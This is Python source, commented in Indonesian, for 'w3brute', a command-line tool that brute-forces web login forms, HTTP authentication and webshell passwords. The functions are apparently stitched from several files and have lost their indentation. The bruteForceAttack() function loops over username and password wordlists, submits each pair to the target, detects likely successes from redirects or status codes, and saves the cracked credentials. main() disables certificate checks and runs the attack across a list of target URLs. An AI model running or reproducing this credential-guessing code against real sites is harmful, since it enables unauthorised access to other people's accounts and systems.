def write(self, msg):
"""
cetak data ke terminal
"""
clearLine()
# simpan pesan, yang nantinya akan digunakan oleh
# fungsi newline()
self.curmesg = msg
msg = self.message + msg
if len(msg) >= self.width:
# untuk lebar terminal kurang dari 51
# pesan akan secara otomatis di pendekan.
if self.width <= 50:
if not konf.disableWrap:
msg = textwrap.wrap(msg, self.width)[0][:-4] + "..."
else:
konf.garisBaru = True
else:
konf.garisBaru = True
msg = msg.ljust(self.width)
if konf.colored():
msg = Fore.GREEN + msg + Style.RESET_ALL
cetakData(msg)
def newline(self, msg):
"""
mencetak text dan pindah ke garis baru
"""
clearLine()
if konf.colored():
color = Fore.LIGHTGREEN_EX
bold = Fore.LIGHTWHITE_EX
reset = Style.RESET_ALL
levelname = getLevelName(msg)
msg = bold + msg.replace(levelname, color + levelname + reset)
text = re.search("\((.+)\)", msg).group(1)
msg = msg.replace(text, color + text + reset)
if ":" not in self.curmesg:
self.curmesg = warnai(self.curmesg, "green", attrs=["bold", "underline"])
else:
usr, psw = self.curmesg.split(" : ")
self.curmesg = warnai(usr, "green", attrs=["bold", "underline"]) + " : " + warnai(psw, "green", attrs=["bold", "underline"])
msg = msg.format(self.curmesg)
msg += "\n"
cetakData(msg)
def newHandler(self, signum, frame):
"""
interrupt handler untuk menghandle interupsi
yang sedang 'menggunakan text progress' ini.
"""
clearLine()
self.finish()
self.defaultHandler(signum, frame)
# reference: https://stackoverflow.com/questions/16941885/want-to-resize-terminal-windows-in-python-working-but-not-quite-right
signal.signal(signal.SIGWINCH, self.handleResize)
def checkLength(self):
"""
memeriksa panjang pesan
"""
if len(self.message + self.curmesg) >= self.width:
self._show_proses_lengkap = False
self.curlen = 0
if not hasattr(self, "_sudah_di_perbaiki"):
self._sudah_di_perbaiki = True
clearLine()
cetakData(self.message)
def checkErrorCode(response):
errcode, message = response
if errcode == errno.ENOENT:
errMsg = "internet connection is not detected"
logger.error(errMsg)
raise W3bruteQuitException
elif errcode == errno.E2BIG:
errMsg = "host %s doest not exist" % repr(target.HOST)
logger.error(errMsg)
raise W3bruteSkipTargetException
elif errcode == errno.ETIMEDOUT:
warnMsg = "w3brute get a response '%s' (%d). " % (message, errcode)
warnMsg += "try to re-connect..."
logger.warning(warnMsg)
tidur = False
for i in xrange(konf.retries):
if not tidur:
# tidur sebentar dan mencoba
# untuk terhubung kembali.
time.sleep(konf.delay)
tidur = True
try:
return urllib2.urlopen(req)
except:
# tidur lagi, habis begadang :)
time.sleep(konf.delay)
criMsg = "failed to connect to server. "
criMsg += "please check your internet connection."
logger.critical(criMsg)
raise W3bruteQuitException
else:
# FIXME: how to fix this?
if "Interrupted" in message:
clearLine()
logger.critical(message)
raise W3bruteSkipTargetException
errMsg = "your internet connection has a problem. "
errMsg += "connection response '%s' (%d)" % (message, errcode)
logger.error(errMsg)
raise W3bruteQuitException
def done(self, msg=""):
"""
cetak pesan selesai
"""
clearLine()
cetakData(msg)
if msg: # jika msg bukan null
# pindah ke garis baru.
cetakData("\n")
# aktifkan kembali interrupt handler
ignoreInterrupt(False)
self.resetSignal()
def bruteForceAttack():
infoMsg = "starting attacks..."
logger.info(infoMsg)
regexp = re.compile(target.PAGE, re.I)
if not auth.IS_AUTHORIZATION:
form = html.form
field = html.field
target.kredensial = list()
try:
# bilang ke interrupt handler
# jika w3brute sedang menjalankan sesi bruteforce
konf.bruteSession = True
if not auth.IS_WEBSHELL_AUTH:
# mendapatkan daftar username sesuai tipe autentikasi.
credType = "standard" if not auth.IS_EMAIL_AUTH else "email"
usernames = sorted(credDb[credType].usernames)
passwords = sorted(credDb.passwords)
pbar = Progress("[INFO] testing account -> ")
installBuiltin("pbar", pbar)
for username in usernames:
username = username.strip()
for password in passwords:
password = password.strip()
msg = "{0} : {1}".format(username, password)
pbar.write(msg)
authcred = None
if auth.IS_AUTHORIZATION:
authcred = (username, password)
url = target.URL
else:
form[field.username] = username
form[field.password] = password
url = getRequestData(form)
response = UserAgent.open(url, authCred=authcred)
# mendapatkan informasi jika akun 'berpotensi'
# dari respon url setelah melakukan POST DATA
try:
newUrl = response.geturl()
if not regexp.search(newUrl):
status.found = True
except AttributeError:
pass
checkRegexValid(response)
checkStatus(username, password)
pindahBaris()
else:
pbar = Progress("[INFO] testing password -> ")
installBuiltin("pbar", pbar)
wordlist = sorted(credDb.wordlist)
for password in wordlist:
password = password.strip()
pbar.write(password)
form[field.password] = password
url = getRequestData(form)
try:
# mendapatkan informasi jika password (berpotensi)
# dari respon kode HTTP
response = UserAgent.open(url, allow_redirects=False)
except W3bruteRedirectException:
status.found = True
checkRegexValid(response)
checkStatus(password)
pindahBaris()
except W3bruteStopBruteForceException:
pass
# bilang ke interrupt handler
# kalau sesi bruteforce sudah selesai.
del konf.bruteSession
pbar.finish()
# cek jika sudah dapat akun berpotensi
if len(target.kredensial) > 0:
infoMsg = "w3brute managed to get %d potential %s" + ("s" if len(target.kredensial) > 1 else "")
infoMsg %= (len(target.kredensial), getCredentialType())
logger.info(infoMsg)
fp = createFileObject()
fieldnames = ["username", "password"] if not auth.IS_WEBSHELL_AUTH else ["password"]
fieldnames.insert(0, "#")
fieldnames.append("status")
output = OutputWriter(fp, fieldnames, konf.fileFormat)
maxval = len(target.kredensial)
spin = Spinner("[INFO] saving results... ", maxval=maxval)
try:
for (num, kred) in enumerate(target.kredensial):
num += 1
kred = (num,) + kred
output.add_row(*kred)
spin.show_progress()
except W3bruteNextStepException:
pass
output.close()
spin.done()
infoMsg = "results of the w3brute are stored in %s" % repr(fp.name)
logger.info(infoMsg)
konf.selesai = True
else:
clearLine()
warnMsg = "[WARNING] w3brute has not managed to find a potential '%s'. " % getCredentialType()
warnMsg += "please try again later.\n"
cetakData(warnMsg)
uninstallBuiltin("pbar")
if isinstance(konf.quit, bool):
raise W3bruteQuitException
raise W3bruteSkipTargetException
def main():
"""
fungsi main untuk menjalankan w3brute di terminal
"""
setBasePath()
disableVerifySslCert()
createLogger()
try:
banner()
options = cmdLineParser() # mendapatkan nilai opsi.
initOptions(options) # menerapkan nilai opsi ke data konfigurasi.
msg = "\n[*] starting at %s\n\n" % time.strftime("%X")
cetakData(msg)
# mendapatkan daftar target.
targetList = getTarget()
for (i, url) in enumerate(targetList):
i += 1
url = url.strip()
url = completeUrl(url)
target.URL = str(url)
infoMsg = "[INFO] #%d url: %s\n" % (i, url)
cetakData(infoMsg)
try: # menjalankan program
init()
except W3bruteSkipTargetException:
clearLine()
if not konf.selesai:
infoMsg = "[INFO] skipping target %s\n" % repr(str(url))
cetakData(infoMsg)
else:
del konf.selesai
# hapus data target sebelumnya.
clearData()
except SystemExit:
konf.lewat = True
except KeyboardInterrupt:
errMsg = "user aborted"
logger.error(errMsg)
except W3bruteQuitException:
pass
except Exception:
clearLine()
warnMsg = "something out of control happens.\n"
warnMsg += ("=" * getTerminalSize()[0]) + "\n"
warnMsg += "Running version: %s\n" % VERSION
warnMsg += "Python version: %s\n" % sys.version.split()[0]
warnMsg += "Operating system: %s\n" % platform.platform()
warnMsg += "Command line: %s\n" % re.sub(r".+?w3brute.py\b", "w3brute.py", " ".join(sys.argv))
warnMsg += "=" * getTerminalSize()[0]
logger.warning(warnMsg)
errMsg = getErrorMessage()
logger.error(errMsg)
finally:
if not konf.lewat:
msg = "\n[-] shutting down at %s\n\n" % time.strftime("%X")
cetakData(msg)
if IS_WIN:
msg = "\n[#] press enter to continue... "
cetakData(msg)
raw_input()